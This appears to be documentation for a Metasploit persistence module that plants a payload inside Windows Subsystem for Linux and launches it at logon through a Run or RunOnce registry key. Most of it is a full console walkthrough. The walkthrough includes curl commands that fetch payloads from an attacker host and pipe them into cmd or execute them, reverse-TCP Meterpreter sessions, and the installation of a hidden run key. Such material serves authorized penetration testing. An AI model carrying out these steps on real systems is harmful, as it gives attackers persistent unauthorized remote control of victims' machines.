Vulnerable Application
This module will install a payload in WSL and execute it at user logon or system startup via the registry value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method). The payload will be installed completely in registry.
Staged payloads, like fetch payloads in linux X64 don't tend to work. The payload will ask for the stage, then submit the HTTP fetch request and when the payload is sent it doesn't execute.
cmd/linux/http/x64/meterpreter_reverse_tcp and unix cmd payloads tend to work.
Verification Steps
Start msfconsole
Get a shell on Windows
Do: use exploit/windows/persistence/wsl/registry
Do: set session #
Do: run
You should get a shell on user or system login.
Options
STARTUP
Startup type for the persistent payload. Options are USER and SYSTEM, defaults to USER.
RUN_NAME
The name to use for the Run key. Default: random
REG_KEY
Registry Key To Install To. Options are Run and RunOnce. Defaults to Run
PAYLOAD_NAME
The filename for the payload to be used on the target host (random by default).
Scenarios
Windows 10 1909 (10.0 Build 18363) User access
Obtain original shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2025-11-16 07:11:24 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wsl/registry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/wsl/registry) > set session 1
session => 1
msf exploit(windows/persistence/wsl/registry) > set payload
Display all 403 possibilities? (y or n)
msf exploit(windows/persistence/wsl/registry) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp
payload => cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(windows/persistence/wsl/registry) > exploit
[*] Command to run on remote host: curl -so ./OOrIkKMB http://1.1.1.1:8080/rnjdQxeDeP7M_rcLHU37ew;chmod +x ./OOrIkKMB;./OOrIkKMB&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/wsl/registry) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /rnjdQxeDeP7M_rcLHU37ew
[*] Started reverse TCP handler on 1.1.1.1:4444
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rdtGlT3MB3n0dVy
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
- ------------- ----- ------- -------
1 Ubuntu Stopped 1 true
[*] Writing payload to: /tmp/DOgQVT
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\91xgjErF
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251116.2715/WIN10PROLICENSE_20251116.2715.rc
Reboot the system
[*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died
[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
[*] Sending payload to 2.2.2.2 (curl/8.5.0)
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49712) at 2025-11-16 07:29:39 -0500
[-] Meterpreter session 2 is not valid and will be closed
[*] 2.2.2.2 - Meterpreter session 2 closed.
msf exploit(windows/persistence/wsl/registry) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: windows
meterpreter > sysinfo
Computer : win10prolicensed.localdomain
OS : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 3...
msf exploit(windows/persistence/wsl/registry) > [*] 2.2.2.2 - Meterpreter session 3 closed. Reason: Died
[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
[*] Sending payload to 2.2.2.2 (curl/8.5.0)
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49726) at 2025-11-16 07:36:17 -0500
